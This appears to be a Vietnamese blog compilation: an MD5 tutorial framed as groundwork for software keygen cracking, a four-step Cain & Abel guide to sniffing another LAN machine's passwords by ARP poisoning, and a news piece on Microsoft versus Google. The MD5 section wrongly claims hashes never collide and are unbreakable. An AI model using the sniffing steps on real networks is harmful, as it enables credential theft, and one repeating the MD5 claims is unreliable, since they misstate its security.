MD5 Algorithm

Mỗi một người có một “dấu lăn tay” (fingerprint) riêng ko ai giống ai đúng ko các bạn?. Lúc 15 tuổi tui làm giấy CMND cho đến nay “dấu lăn tay” của tui vẫn vậy. Và có khi nào bạn hỏi: Ai đã tạo ra nó thế?!. Xin trả lời: đó là do Ông Trời tạo ra bạn ạ!!!.(lãng xẹt) Hihi
Từ những ý tưởng đó , con người mới nghĩ ra việc : tại sao chúng ta ko làm Ông Trời một phen. Chúng ta thử tạo ra “dấu lăn tay” cho 1 cái gì đó để phân biệt chúng với nhau. Ví dụ như tên của mỗi người chẳng hạn (các bạn nên có khái niệm tên (name) là một chuổi các ký tự được gọi là string). Hêhêhê . Do vậy , trong IT người ta bắt đầu nghiên cứu các “cái máy” tạo ra “dấu lăn tay” cho các chuổi string. Một trong những “cái máy” đó là “Thuật toán MD5” mà chúng ta sắp nghiên cứu đây.
“Dấu lăn tay” do Thuật tóan MD5 (gọi tắt là MD5) từ một string gọi là message digest (tín hiệu digest, gọi tắt là md) hay còn gọi là “MD5 hashes” (gọi tắt là hashes). Một tín hiệu hashes là một chuổi các ký tự hexa ( bao gồm số 0-9 và a-f, các số hex ấy mà!!). Về nguyên tắt tạo ra hashes là :
-Bất cứ string nào cũng điều có duy nhất một hashes, ko bao giờ có 2 hashes cho 1 string
-Hai string khác nhau thì có 2 hashes khác nhau, ko bao giờ trùng nhau.
-Hảy nhớ điều này: từ 1 hashes ta tìm ngược lại string của nó được ko? Điều này ko bao giờ làm được. Ko một “máy” nào làm được.Chúng ta nên nhớ điều này.
Đó là những gì mà thuật tóan MD5 làm ra.
TUT này chúng ta ko tìm hiểu sâu thật sâu về MD5, như là tại sao làm như thuật tóan thì đáp ứng các điều kiện trên vừa nói, đó là việc của các nhà phát minh, các nhà tóan học.Chúng ta chỉ tìm hiểu cách thực hiện của MD5 mà thôi. Từ đó chúng ta có thể ứng dụng nó để nhận dạng ra chương trình nào sử dụng MD5, và sau đó ….keygen nó …hihi

Sau đây tui xin trích dẫn một số tài liệu về MD5 mà tui tìm hiểu được trên Net. Các bạn đọc từ từ nhé ko thôi bị mắc nghẹn à.

MỘT SỐ THÔNG TIN CĂN BẢN:

MD5 LÀ GÌ ?

MD để chỉ cho “message digest” (Lấy 2 chử đầu). MD5 là một thuật tóan lấy một tín hiệu vào có chiều dài bất kỳ và đưa ra một tín hiệu digest có chiều dài cố định (128-bit, 32 ký tự hexa), được làm ra từ 1 giá trị hexa (chú ý : mỗi ký tự hex là 4 bit, do đó 128bit là 32 ký tự hex). OK, bây giờ nói rõ hơn một chút : MD5 là cách căn bản để lấy chùm ký tự ( là digits, alphabeic hay gì khác ), được gọi là string nhập vào, và thay đổi chúng thành một chùm ký tự dài 32 ký tự , được gọi là tín hiệu digest (message digest) hay hashes của string được nhập vào, chuổi 32 ký tự này được tạo ra từ các ký tự hexa ( những digits: 0-9 và các chử a-f). Điều này có nghĩa là, với một string nhập vào có chiều dài bất kỳ , MD5 sẽ luôn luôn cài đặt “một vài thứ” để thành một chuổi string dài 32 ký tự, mà các ký tự là các ký tự hexa. Tín hiệu digest sẽ ko có khỏang trống, hay dấu hoặc kép hay bất cứ thứ gì khác 0-9 và a-f trong tín hiệu hashes được xuất ra.
MD5 hashes có tiện dụng là những hashes tạo ra trông khác nhau hòan tòan từ những tín hiệu nhập vào hơi hơi giống nhau. Ví dụ sau sẽ làm rỏ hơn về điều này:
• The MD5 hash of jim is 5e027396789a18c37aeda616e3d7991b
• The MD5 hash of Jim is d54b3c8fcd5ba07e47b400e69a287966
• The MD5 hash of Jimmy is 495b3121d23f5988b133882b36aa7214

Như bạn thấy đó, có ba tín hiệu nhập vào “hơi hơi giống nhau” nhưng các tín hiệu MD5 hashes xuất ra hòan tòan khác nhau. Ví dụ này cũng chứng minh hai ký tự j và J là 2 ký tự khác nhau . Do đó chúng ta thấy “máy đẻ” ra MD5 hashes là lọai rất nhạy cảm. Ở đây cần chú ý thêm là trong ví dụ thứ 3 chỉ thêm vào 2 ký tự (my) ở cuối chuổi của ví dụ 2 , và hashes của nó đã thay đổi hòan tòan. Vì vậy chúng ta ko thể có hashes của chuổi “Blehlo” từ hashes của chuổi “Bleh” bằng cách “vá viếu” thêm vài ký tự – thay đổi trong chuổi string nhập vào thì tín hiệu hashes của nó cũng sẽ thay đổi hòan tòan. Và ở đây cũng nên chú ý với 3 string nhập vào có chiều dài ko giống nhau nhưng các hash sinh ra đều có chiều dài là 32 ký tự (bao gồm các số 0-9 và a-f), ở ví dụ sau cùng ta cũng thấy chuổi string nhập vào dài hơn 2 ký tự so với 2 string trước nhưng chuổi hash của nó cũng chỉ có 32 ký tự chử số hex.
Mặc dù tín hiệu MD5 hashes xuất ra ngẫu nhiên từ string nhập vào , nhưng thật ra chúng ta có một kiểu mẫu tạo hashes MD5(một thuật tóan MD5) được sử dụng để “quay” string nhập vào thành một md hay một hashes. Nếu bạn muốn sử dụng nó thì bạn có thể đọc ở tut này ở phần sau . Bởi vì MD5 được sử dụng một thuật tóan giống nhau cho mỗi lần tính tóan nên MD5 hashes của chuổi jim luôn luôn là
5e027396789a18c37aeda616e3d7991b
Trong thực tế , một số chương trình còn thêm vào một vào vài lọai thuật tóan khác khi md được sinh ra , làm cho MD5 cực kỳ thông dụng và là 1 công cụ rất mạnh. Nhưng có lẻ điều quan trọng nhất là trong thực tế MD5 được dùng như một cách tạo hashes hay ta gọi là hash chuổi ( biến chuổi thành 1 chuổi “vớ vẫn” nào đó)……

Tôi xin nói thật, những điều tui tìm hiểu được trên đây làm cho tui vô cùng “đắc ý”. Tóm lại chúng ta cần biết như sau:

-MD5: là một thuật tóan biến đổi 1 chuổi string thành 1 tín hiệu “message digest” hay còn gọi là “MD5 hashes”. Đó là một tín hiệu 128 bits – 32 ký tự hexa.
-hash một chuổi string là biến một string thành một tín hiệu message digest
-Thủ tục (procedure) hay hàm (function) trong chương trình để hash chuổi gọi là “máy sinh” MD5 hashes hay còn gọi nôm na là “máy hash”.

Bây giờ chúng ta sẽ bước sang một câu hỏi khác rất quan trọng.

CHÚNG TA “DỊCH NGƯỢC” LẠI MỘT TÍN HIỆU MD5 HASHES NHƯ THẾ NÀO ?

Như trên tui đã nói : từ 1 hashes ta tìm ngược lại string của nó được ko? Điều này ko bao giờ làm được. Ko một “máy” nào làm được.
Vậy ở đây câu trả lời là : “Bạn không thể” . Cách hash một string có nghĩa là tín hiệu md xuất ra bằng thuật tóan MD5 là ko thể đảo ngược. Không thể biết cách tìm ra chuổi origin từ tín hiệu MD5 hashes. Vì như ví dụ ở phần trước, những chuỗi có vẽ giống nhau nhưng tín hiệu md sinh ra hòan tòan khác nhau Tức là chúng ta ko thể nào “decode” (dịch ngược) được một chuổi MD5 hashes. Chỉ có một cách có được chuổi origin là bằng cách “brute force cracking”. Tức là phải duyệt qua rất nhiều tổ họp các ký tự của chuổi vào cho đến khi một trong những chuổi md được tạo ra của chúng bằng với chuổi md cần tìm origin. Tuy nhiên , với khả năng máy tính thời nay muốn làm điều này phải mất rất nhiều năm. Mặt khác ở đây chúng ta cần chú ý đó là tín hiệu MD5 hashes được thiết kế ra là “độc nhất vô nhị”. Trên lý thuyết cũng có khả năng 2 chuổi khác nhau có tín hiệu md giống nhau nhưng khả năng này rất rất nhỏ (1/(16^32) hay vào khỏang (3.4E+38). Bởi vậy có một lần tui tham gia forum HVA và có người sử dụng chương trình tìm password cho tập tin WINRAR bị mất password và bác Comp đã kiến nghị ko nên dùng chương trình đó là lý do trên. Vì khả năng tìm ra password rất “dài hơi” và máy tính chắc chạy vài tuần của chưa tìm ra. Hảy bỏ ý định đó đi các bạn.

MD5 ĐƯỢC SỬ DỤNG CHO VIỆC GÌ ?

Chính các đặc điểm của MD5 làm cho nó thường được ứng dụng trong một số trường hợp như sau:
-Nó thường được dùng để checksum tòan bộ file. Các nhà phát triển ứng dụng thường dùng MD5 trong việc cho phép download file trên NET. Họ sẽ cho “xuất bản” một tín hiệu md của file download. Khi chúng ta tải file về , thì file chúng ta vừa download sẽ có một tín hiệu md, nếu tín hiệu này khớp với tín hiệu các nhà phát triển ứng dụng đã “xuất bản” ở trên. Thì OK, ko có vấn đề. Nếu hai tín hiệu md này khác nhau, có thể có trong file download có virut hay cái gì đó tương tự.
-Một ứng dụng thường được dùng nữa là hash một password. Được dùng cho việc bảo mật một ứng dụng, hay những gì tương tự …v….v….

Đây là một số thông tin căn bản chúng ta cần biết qua khi bắt đầu tìm hiểu về thuật tóan MD5. Ở đây tui cần nói thêm một chút:

-Chúng ta chỉ có thể tạo ra tín hiệu message digest từ một chuổi string ( đây được gọi là quá trình “encode”).Chúng ta ko thể “dịch ngược” một message digest ra một string origin (quá trình “dịch ngược” gọi là “decode”). Khi tìm hiểu về MD5, tui có hỏi trên Forum HVA về các soft dùng MD5, và có một người trả lời là “bạn cần soft encode hay decode”. Và hacnho trả lời giúp tui : dĩ nhiên là encode. Thật tình tui ko thể nào chịu nổi lọai người này. Họ chỉ biết trình diễn kiến thức. Đây ko phải là “văn hóa” khi tham gia một forum. Mong mọi người nên chân thành với nhau nhiều hơn.
-Một số người sai lầm khi hiểu rằng “MD5 hashes “ là thuật tóan tựa như MD5 ,tức là thuật tóan trên nền tản MD5 biến đổi đi đôi chút. (Các thuật tóan này tôi gọi nôn na là thuật tóan “Lai căn MD5”). Điều này sai lầm , benina chỉ xin nhắc lại : MD5 hashes = message digest.
-Đứng về mặt cracking, một số người khi chưa tìm hiểu kỹ MD5 và thấy decode ko được nên cho rằng các soft dùng thuật tóan MD5 là ko keygen được “bất khả xâm phạm” . Lại thêm một sai lầm nữa. Vì sau vậy?. Vì nếu 1 soft được bảo vệ bằng đúng “chính xác thuật tóan MD5” thì quá dễ để tìm ra số serial vì chúng ta đã biết chính xác thuật tóan này diễn ra như thế nào. Vì vậy các soft chỉ dùng thuật tóan “lai căn MD5” , hay lồng các thuật tóan khác với thuật tóan MD5. Vì vậy các bạn muốn tìm các soft trong thực tế sử dụng MD5 rất khó. (có thể nói là ko có vì ko coder nào ngu đến như vậy!). Tui chỉ tìm được một soft có thuật tóan khá giống thuật tóan MD5 mà thôi. Thực ra tui tìm trên Net thấy có 2 soft có thuật tóan “sát” với MD5, nhưng ko còn đường download trên Net nữa vì quá cũ. Tui phải ra tiệm bán các đĩa CD, và tìm được 1 Soft (mô phật! hên thiệt). Trong quá trình tìm hiểu MD5, tui cũng thu thập được một số soft có thuật tóan “Lai căn MD5”.Rồi tui sẽ share cho các bạn.

Kỹ thuật Sniff Password sử dụng Cain & Abel

Cain & Abel là một trong những công cụ đứng trong top các công cụ về security. Các bạn có thể tại phiên bản mới nhất tại http://oxid.netsons.org/download/ca_setup.exe
Hiện tại mình sử dụng phiên bản Cain & Abel v4.9.3
Cain & Abel v4.9.3 released
New features:
- Added Windows Mail (Vista) Password Decoder for POP3, IMAP, NNTP, SMTP and LDAP accounts.
- Added PTW WEP cracking attack.
- Added Windows Vista support in Wireless Password Decoder.
- Wireless Password Decoder now uses DLL injection under XP.

Các tính năng của Cain thì khỏi phải nói , quá trời trời luôn, ở đây mình chỉ giới thiệu Sniff Password. Các bạn có thể tham khảo thêm những tính năng của nó trong tài liệu kèm theo chương trình.

Bước 1: Sau khi install xong Cain và khởi động Cain thì ta cần phải cấu hình Network Adapter cho đúng.
Trên menu của Cain chọn Configure –> lựa chọn Network Adapter phù hợp
Click Start Sniffer
Bước 2: Lựa chọn Tab Sniffer –> Scan MAC Addresses, ở đây sẽ ra danh sách các địa chỉ IP mà chương trình Scan được
Bước 3: Tab bên dưới của Tab Sniffer lựa chọn phần APR. Tai khung APR ta có thể thêm địa chỉ IP mà cần sniff. Lựa chọn IP đích , IP nguồn
Bước 4: Và click Start APR, và ngồi chờ password “về làng”

Các bạn có thể xem video clip sau để biết rõ hơn
Trong đoạn video clip mình sẽ sniff password gửi từ máy có IP: 192.168.1.7.
Địa chỉ IP máy mình là 192.168.1.6 có sử dụng chương trình Cain đang chờ dzớt bất kỳ password nào mà máy 192.168.1.7 đệ trình

Video Demo Sniff Password

Cuộc đối đầu Microsoft – Google

Tại Diễn đàn Kinh tế thế giới diễn ra ở Thuỵ Sỹ, Microsoft, đấu thủ nặng ký nhất trong lĩnh vực phần mềm, và Google, công ty tìm kiếm Internet hay gây gổ, đã nhìn nhau thận trọng giống như các võ sỹ quyền anh bước lên sàn đấu.
Bill Gates, Chủ tịch của Microsoft, đã bày tỏ sự khâm phục của mình về ”chỉ số thông minh” của các nhà thiết kế Google. Đề cập về quyết định bỏ qua thị trường tìm kiếm trước đây của Microsoft, ông nói: ”Chúng tôi đã đưa ra một hướng đi mà hiện tôi nhận thấy là đã sai lầm ”Nhưng ông đã nhấn mạnh thêm, ”chúng tôi sẽ đuổi kịp họ”.

Bốn lãnh đạo hàng đầu của Google đang có mặt ở diễn đàn kinh tế thế giới – được tổ chức tại khu nghỉ trượt tuyết ở Davos – đã không còn bị ám ảnh trước những động thái của ngài Gates nữa. Eric E. Schmidt, Chủ tịch hội đồng quản trị của Google, đã viết trong một e-mail cho một đồng nghiệp: ”Chúng ta đã có nhiều cơ hội hơn để quan sát Bill và Microsoft tại diễn đàn Davos lần này”. Thông điệp này đã được chuyển tiếp cho các nhân viên qua danh sách mail nội bộ của công ty.

Ông Schmidt khẳng định rằng Microsoft đang chú ý nghiên cứu danh mục các bản quyền sáng chế của Google trong lĩnh vực tìm kiếm, nhằm tìm ra những yếu điểm tiềm ẩn. Và vì Google sử dụng phần mềm nguồn mở miễn phí Linux – thách thức lớn nhất của Windows – để cung cấp dịch vụ tìm kiếm, nên Microsoft lo ngại có thể sẽ ở thế bất lợi trong cạnh tranh. Ngài Schmidt đã viết trong e-mail: ”Dựa vào những phản ứng bản năng của họ đối với những thảo luận về ”nguồn mở”, họ bị ám ảnh với việc nguồn mở là một mô hình kinh doanh”.

Quay lại thời kỳ giữa những năm 90, Netscape Communications, một hãng công nghệ mới khởi nghiệp và ngang tàng khác ở vùng Bay Area, đã thương mại hoá trình duyệt web, tạo nên cơn sốt dot.com… một trình duyệt Web thương mại, đã phát động một cuộc đổ xô đi tìm vàng trên dot-com. Công ty này đã quả quyết rằng chương trình phần mềm mới lạ của hãng sẽ biến hệ điều hành Windows đầu tàu của Microsoft chỉ như một ”mớ các phần mềm điều khiển thiết bị hỗn độn”.

Microsoft – có trụ sở tại ngoại ô Seattle thuộc Redmond, cách xa Silicon Valley, trái tim của ngành công nghiệp công nghệ quốc gia – đang nghe ngóng Tình hình khi trình duyệt Web này xuất hiên,

Ngài Gates, nhận ra mối đe doạ mà Internet đặt cho công việc kinh doanh của ông ta một cách muộn màng, đã tập trung hoả lực của Microsoft vào Netscape và đè bẹp đối thủ này. Netscape sau này đã được America Online mua lại và hiện chỉ còn là cái bóng của chính mình trong một góc tối của Time Warner.

Tuy nhiên, như một hệ quả tất yếu, Gates đã gây ra vụ kiện chống độc quyền của liên bang đánh vào công ty, dấy lên nỗi lo ngại về sự sụp đổ của Microsoft. Cuối cùng, Microsoft đã thoát nạn một cách êm thấm nhờ bản án tương đối ôn hoà của thẩm phán.

Ngày nay, gần như tất cả mọi người ở Silicon Valley, từ những nhà đầu tư mạo hiểm, những kỹ sư công nghệ đến những nhà kinh doanh bất động sản và chủ khách sạn, đều đã bắt đầu đặt câu hỏi: Liệu Google có trở thành Netscape tiếp theo?

Ngài Gates, dù đã hứa hẹn trong suốt hơn một thập kỷ qua – nhưng cho tới nay vẫn chưa đưa được thông tin tới tận tay khách hàng, đã quyết định rằng kinh doanh tìm kiếm Internet vừa là một mối đe doạ đáng sợ, vừa là một thời cơ quý giá.

Là người đồng sáng lập và kiến trúc sư trưởng phần mềm đương nhiệm của Microsoft, ngài Gates sẵn lòng thừa nhận rằng hồi đó Microsoft cảm thấy thị trường tìm kiếm Internet ”khá vu vơ’’. Bất chấp cái nhìn tham vọng thuở ban đầu, Gates đã không dốc sức dốc tiền cho những phần mềm cải thiện khả năng tìm kiếm thông tin cho người sử dụng máy tính – cho đến khi nhìn thấy lợi nhuận của chúng.

Và thế là cơ hội đó đã “rơi đúng vào tay’’ hai sinh viên tốt nghiệp chuyên ngành vi tính tại Đại học Stanford, Sergey Brin và Larry Page, những người đã “liều lĩnh” xem thường ý kiến chung của cả giới công nghệ bấy giờ rằng công nghệ tìm kiếm sẽ trở thành một mặt hàng rẻ mạt, “đầu thừa đuôi thẹo’’.

Trong khi những đại gia Internet cạnh tranh gay gắt với nhau trong lĩnh vực cổng Web thương mại điện tử và dịch vụ truy cập đến những nhà cung cấp như America Online, Google đã phát triển một công cụ tìm kiếm nhanh mà chẳng bao lâu sau đã trở thành một hiện tượng Internet mang tính toàn cầu. Nó đã hất cẳng những công cụ tìm kiếm trước đó bởi vì công nghệ do Brin và Page phát minh tỏ ra vượt trội trong việc hiển thị các kết quả tìm kiếm, thoả mãn những yêu cầu của người lướt Web.

Kết quả là hiện nay, Google đã có một lượng khách hàng khổng lồ, với 200 triệu tìm kiếm trung bình mỗi ngày. Đó là một ưu thế lớn của Google so với các đối thủ đang tìm cách bắt kịp nó.

Nancy Blachman, một nhà khoa học máy tính, và là tác giả của một trang web độc lập hướng dẫn cách sử dụng Google (www.googleguide.com) nói: ”Hệ thống có nhiều người dùng nhất mang lại lợi ích nhiều nhất. Microsoft đối mặt với một cuộc đấu gay go bởi vì Google điều chỉnh hệ thống của mình bằng cách xem người dùng điều chỉnh những truy vấn của họ ra sao”.

Nhưng Google đã làm được nhiều hơn việc phát triển một công nghệ mới thông minh. Không giống nhiều dot-com sáng lên trong những năm 1990, Google đã tìm cách để biến nó thành một việc kinh doanh mang lại lợi nhuận cao. Công ty này đã chứng minh rằng tập trung quảng cáo dựa vào các từ khoá liên quan đến những yêu cầu tìm kiếm của người lướt Web là hình thức hiệu quả nhất của quảng cáo trực tuyến.

Điều đó đã nhóm lên một cuộc chiến tay ba giữa Microsoft và hai đối thủ tại Silicon Valley: Yahoo, có trụ sở tại Sunnyvale, Calif., và Google, công ty có trụ sở gần đó, tại Mountain View. Nhấn mạnh tầm quan trọng của các công cụ tìm kiếm đối với quảng cáo Internet, mới đây Yahoo cho biết đã có kế hoạch để chấm dứt sự nhờ cậy duy nhất của mình cho kết quả tìm kiếm trên Google, và đã thiết lập phòng thí nghiệm nghiên cứu của riêng mình để cố gắng hạ vị trí dẫn đầu của đối thủ mới này.

Thành công về tài chính của Google là rõ ràng. Theo một số uỷ viên ban quản trị biết rõ con số tài chính bí mật của công ty, trong năm 2001, hãng này đã gần như không có doanh thu; trong năm ngoái, họ đã đạt doanh thu gần 1 tỷ USD và lợi nhuận khoảng 350 triệu USD.

Về phần Microsoft, những người trong ban quản trị đã bắt đầu khoe khoang sự tăng thu nhập nhanh chóng từ những quảng cáo Internet dựa vào sự cộng tác MSN của hãng với Overture, hiện là một bộ phận Yahoo và cũng đi tiên phong trong quảng cáo tìm kiếm web. Trong quý tài chính thứ hai, kết thúc hôm 31/12, Microsoft đã báo cáo lợi nhuận 292 triệu USD về quảng cáo trực tuyến, một sự tăng trưởng 47% theo thời kỳ tương ứng sớm hơn một năm. Công ty cho biết toàn bộ thu nhập quảng cáo trực tuyến của mình, bao gồm cả các nguồn nằm ngoài quảng cáo tìm kiếm, đã đạt 1 tỷ USD trong năm đã qua.

Trong năm nay, Microsoft đang mong đợi đưa ra công khai công nghệ tìm kiếm của riêng mình, công nghệ mà ngài Gates nói sẽ giúp Microsoft bắt kịp Google. Tuần trước, Microsoft đã đưa ra phiên bản thử nghiệm gồm một bộ các nút phần mềm đặc biệt của trình duyệt IE mà hãng đã thiết kế để hướng dẫn những người dùng tìm kiếm MSN và các dịch vụ liên quan. Tuy nhiên, đối với Google, mối đe doạ lớn hơn là Microsoft sẽ quyết định chọn công cụ tìm kiếm Internet, giống như trình duyệt Web trước đó, lẽ ra là một phần không thể thiếu trong các phiên bản tương lai của hệ điều hành Windows.

Thế nhưng, tại thời điểm này, sự dẫn đầu của Google dường như là không thể chế ngự. Năm ngoái, Rick Rashid, Phó chủ tịch Microsoft phụ trách bộ phận nghiên cứu của công ty, đã đến các tiền đồn của hãng tại Silicon Valley để đưa ra một sự chứng minh về một công cụ tìm kiếm Microsoft Research dùng để thí nghiệm. Tuy nhiên, sau đấy ít lâu, Mike Burrows, một trong những người tiên phong đầu tiên trong tìm kiếm Internet tại Digital Equipment, người sau đó đã hỗ trợ thiết kế công cụ tìm kiếm dùng để thí nghiệm của Microsoft, đã êm ả rời bỏ Microsoft. Anh ta đã gia nhập Google.

Nhưng thậm chí nếu Google có thể bảo vệ vị trí đứng đầu về công nghệ, nó sẽ vẫn thua Microsoft về tiềm lực tiếp thị?

Google tham gia công việc đúng quy tắc Silicon Valley đầy khắc nghiệt mà tiêu biểu là các công ty giống như Netscape. Trụ sở mới của hãng, trên một khu bãi rộng rãi trước kia được SGI, một nhà sản xuất máy tính sử dụng, từ trụ sở ban đầu của Netscape, chỉ cần đi ngang qua đường cao tốc là đến.

Phát mãi chứng khoán (IPO) – canh bạc của Google

Nhưng nhiều uỷ viên ban quản trị Silicon Valley kì cựu đang hoài nghi về khả năng Google giữ được văn hoá tập thể của nó với nhau một khi nó đi vào cổ phần hoá vào cuối năm nay. Việc đưa ra cổ phần hoá bước đầu, đã thấy trước, được cho rằng là để tạo ra hàng trăm người giàu có ngay lập tức giữa những nhân viên thông thường của hãng, nhưng sẽ sa thải nhiều nhân công được thuê khác giống như những người thầu khoán thiếu thu nhập đáng kể. Như một kết quả, một số người đã than phiền rằng Google đang thúc đẩy một xã hội giai cấp trong nội bộ của nó.

Mặc dù, trong một phạm vi nào đó, sự bất mãn có thể được hạn chế trên quy mô lớn nhờ công việc kinh doanh quảng cáo Adwords của công ty, công việc nhằm mục đích tạo và đặt quảng cáo tìm kiếm được tập trung. Hoạt động đó đã nhanh chóng làm tăng những người lao động tạm thời. Một uỷ viên ban quản trị của Google cho biết: ”môi trường Adwords là tàn bạo”.

Những người đã đi qua những con đường gập ghềnh tương tự tại Silicon Valley thì nói:  Mặc dù, rõ ràng, việc giữ tinh thần đồng đội sôi nổi của Google rất thiết thực sau I.P.O. sẽ khó khăn.

Một uỷ viên ban quản trị trước đây của Netscape, người cũng lo lắng rằng hai người sáng lập trẻ tuổi, với tất cả sự tài giỏi của họ, có thể không thích hợp lắm với kiểu nhóm quản lý cần để vận hành Google như một công ty cổ phần phát triển nhanh chóng, cho biết: ”Để đối phó với sự thách thức, Google đang tính toán để tiếp tục duy trì một tốc độ đổi mới cao” trong dáng vẻ bên ngoài của một sự kiện đổ vỡ giống như I.P.O”.

Mặc dù Google có những mặt dễ bị tấn công rõ ràng, Microsoft đã thấy rõ ở Silicon Valley một sự hùng mạnh nhưng không phải là đối thủ có tính sáng tạo đặc biệt. Nằm ngoài phạm vi công việc kinh doanh Office và Windows nòng cốt của mình, gần đây Microsoft không có nhiều thành công để gây sự chú ý – hãng đã có một danh sách tăng trưởng gây thất vọng. Điều này bao gồm bộ chơi game video Xbox và hộp Ultimate TV set-top.

Nói cách khác, những đối thủ đã chiến đấu với Microsoft và sống sót để nói về nó. Stewart Alsop, một nhà tư bản kỳ cựu, người đã hỗ trợ tài chính để sáng tạo bộ phận ghi video số của TiVo, cho phép những người xem TV dễ dàng ghi hàng giờ những video được soạn chương trình để xem tại những thời điểm khác, thì nói: ”Tại TiVo, chúng tôi đã kiềm chế nhìn vào cái thùng 40 tỷ USD. Chúng tôi đã né tránh viên đạn đặc biệt đó khi Microsoft ngừng hoạt động Ultimate TV và dần dần bỏ kinh doanh”.

Theo những uỷ viên ban quản trị khác, những người cạnh tranh với Microsoft, vị trí của Google có khả năng phòng thủ hơn những gì mà những người đứng đầu của Microsoft tin tưởng.

Rob Glaser, Chủ tịch ban quản trị của RealNetworks, hãng cạnh tranh với Microsoft về phần mềm chạy video và âm thanh số trong các máy tính cá nhân thì nói: ”Thông tin tốt cho Google đó là những cái họ làm có nhiều nhánh, không dễ dàng gì có thể đáp ứng theo một bước”.

Còn những người khác thì nói rằng mặc dù bản án chấp thuận dàn xếp vụ độc quyền của Bộ Tư pháp còn yếu kém, nó có thể vẫn đủ là một rào cản để ngăn chặn Microsoft trong việc tạo ra tìm kiếm Internet như một thành phần tích hợp của hệ điều hành theo cùng cách hãng đã tích hợp trình duyệt Web.

S. Jerrold Kaplan, một người điều hành kinh doanh, cạnh tranh chống lại Microsoft trong khi làm việc tại Lotus, hãng tạo ra bảng tính và bây giờ là bộ phận của I.B.M. nói: ”Họ không thể hạ thấp Google dựa vào giá cả, và tôi không nghĩ họ có thể tránh khỏi việc tìm kiếm hợp nhất”.

Một uỷ viên quản trị của Google cho biết: Khi sẵn sàng đưa ra việc cổ phần hoá, Google đang cố gắng tránh không theo vết xe đổ Netscape bằng cách duy trì tập trung vào biện pháp làm hài lòng khách hàng của mình. Trong những chiếc máy tính tại trụ sở của Google, trang chủ liên tục hiển thị những phản hồi đồ thị cho biết Google làm tốt công việc tìm kiếm ra sao, so sánh với các đối thủ của nó. Thậm chí độ dốc nhẹ nhất trong hiệu suất tìm cũng tạo ra báo động.

Google cũng đã dùng một người từng trải tại Silicon Valley, William V. Campbell, Chủ tịch của Intuit, như một cố vấn. Nguyên tắc chỉ đạo của ông dành cho những người của Google, như những người lao động tự dựa vào chính họ, đó là: không để ý đến sự tham gia sắp tới của Microsoft như một đối thủ và tập trung vào khách hàng.

Nguồn lực chất xám và khách hàng

Một vài uỷ viên ban quản trị của Google cho biết Microsoft đã bắt đầu một chiến dịch tuyển mộ với mục đích thu hút những nhân viên thoái chí và thiếu niềm tin của Google. Những thành viên mới Microsoft đã gọi đến nhà những nhân viên của Google, thuyết phục họ gia nhập Microsoft và ám chỉ rằng những quyền lựa chọn cổ phiếu của họ sẽ mất giá trị một khi Microsoft gia nhập thị trường tìm kiếm bằng một biện pháp thật sự.

Lisa Gurry, Giám đốc phụ trách sản phẩm tại MSN cho biết, ”Phương pháp của chúng tôi đã từng tìm thấy những nhân tài thông minh và giỏi nhất. Ngoài điều đó ra, tôi không thể bổ sung bất cứ điều gì”.

Những người đứng đầu Google cũng cho biết họ tin rằng Microsoft đang đeo đuổi một hệ thống tìm kiếm website bị Google đánh giá thấp, những website thống kê lượng truy cập chuyên ăn tiền các công ty để cố gắng thổi phồng vị trí của họ. Công ty đang thu hút sự cộng tác của những khách hàng không thiện cảm với Google.

Theo Ms. Gurry, hiện nay, Microsoft đang dựa vào Overture để thực hiện những danh sách tìm kiếm trả tiền. Nhưng Google vẫn đang trụ vững một cách chắc chắn. Như chính ngài Gates đã thừa nhận, Google đã được xếp vào hàng ngũ những chuyên gia công nghệ xuất sắc. Họ được tập trung vào cả việc giữa vững vị trí dẫn đầu của công ty về công nghệ tìm kiếm và cả việc phát triển lĩnh vực dịch vụ mới.

Để hỗ trợ cho công việc, Google đã âm thầm phát triển những hệ thống mà những chuyên gia công nghiệp nhận định sẽ là những công cụ tính toán lớn nhất thế giới. Mùa xuân năm ngoái, Google đã có hơn 50.000 máy tính phân bổ ở 12 trung tâm máy tính lớn trên khắp thế giới. Theo một người hiểu chi tiết về trung tâm dữ liệu tính toán Google, đến lễ Tạ ơn năm 2003, số máy tính trong mạng tìm kiếm của hãng đã đạt mức đỉnh 100.000 chiếc. Công ty đang đặt một canh bạc quan trọng để Microsoft sẽ gặp khó khăn khi đối chọi với thời gian đáp ứng của nó theo dòng lũ ngày càng tăng của những yêu cầu tìm kiếm.

Ngoài hoả lực tính toán bổ sung, Google có một danh sách mở rộng các dịch vụ mới mà nó sẽ đưa ra như sự cạnh tranh với những tuyên bố của Microsoft và Yahoo. Ví dụ, mới đây nó đã giới thiệu Orkut, một dịch vụ mạng xã hội dự định cạnh tranh với Friendster, LinkedIn và những dịch vụ khác. Những bí mật vẫn là một dịch vụ thư điện tử có một thành phần quảng cáo.

Công ty cũng đã đang đẩy mạnh tìm kiếm các nguồn thông tin mới theo danh mục, nằm ngoài phạm vi những tài liệu đã lưu trữ ở dạng số. Trong tháng 12, hãng bắt đầu một cuộc thử nghiệm với những nhà xuất bản sách cho các phần danh mục sách, những bài phê bình và những thông tin thư mục khác cho những người lướt Web.

Và Google đã bắt tay vào một nỗ lực bí mật và tham vọng được biết đến như Project Ocean, theo một cá nhân liên quan đến hoạt động. Với sự hợp tác của Stanford University, hiện nay, công ty có kế hoạch số hoá toàn bộ bộ sưu tập sách khổng lồ của Thư viện đã xuất bản trước năm 1923, những cuốn sách không bị hạn chế lâu nữa bởi những giới hạn bản quyền. Dự án có thể bổ sung hàng triệu cuốn sách được số hoá sẽ sẵn có dành riêng qua Google.

Về mặt tiếp thị, công ty đang chạy đua để thiết lập sức mạnh của hãng ra nước ngoài. Wayne Rosing, Phó chủ tịch về kỹ thuật tại Google, đã từng chọn đi du lịch khắp thế giới, đưa công cụ tìm kiếm của công ty vào những hệ thống kinh tế địa phương và những công nghệ cục bộ. Hãng đang tập trung ban đầu vào 12 quốc gia.

Ông Page, người đồng sáng lập Google, thậm chí đang cố gắng thuyết phục ông Schmidt, một giám đốc điều hành kỳ cựu được tuyển mộ từ Novell Inc. và những nhân vật khác trong công ty để tiếp thị một loại điện thoại có tích hợp một PDA giản thiểu bên trong, cho phép những người lướt web sử dụng Google ở bất cứ đâu.

Đối với tất cả tính hiệu động thái quá của Google, vẫn có một ý thức mỏng manh trong nhiều người kỳ cựu Silicon Valley điều mà họ đã nhìn thấy bộ phim này trước. Công ty có thể không có vẻ ngạo mạn của Netscape, nhưng vẫn không rõ là tất cả sự tiếp thị thông minh, công nghệ và sự nhận dạng loại hàng của nó có khả năng chống lại sự tấn công dữ dội của Microsoft khi nó đến.

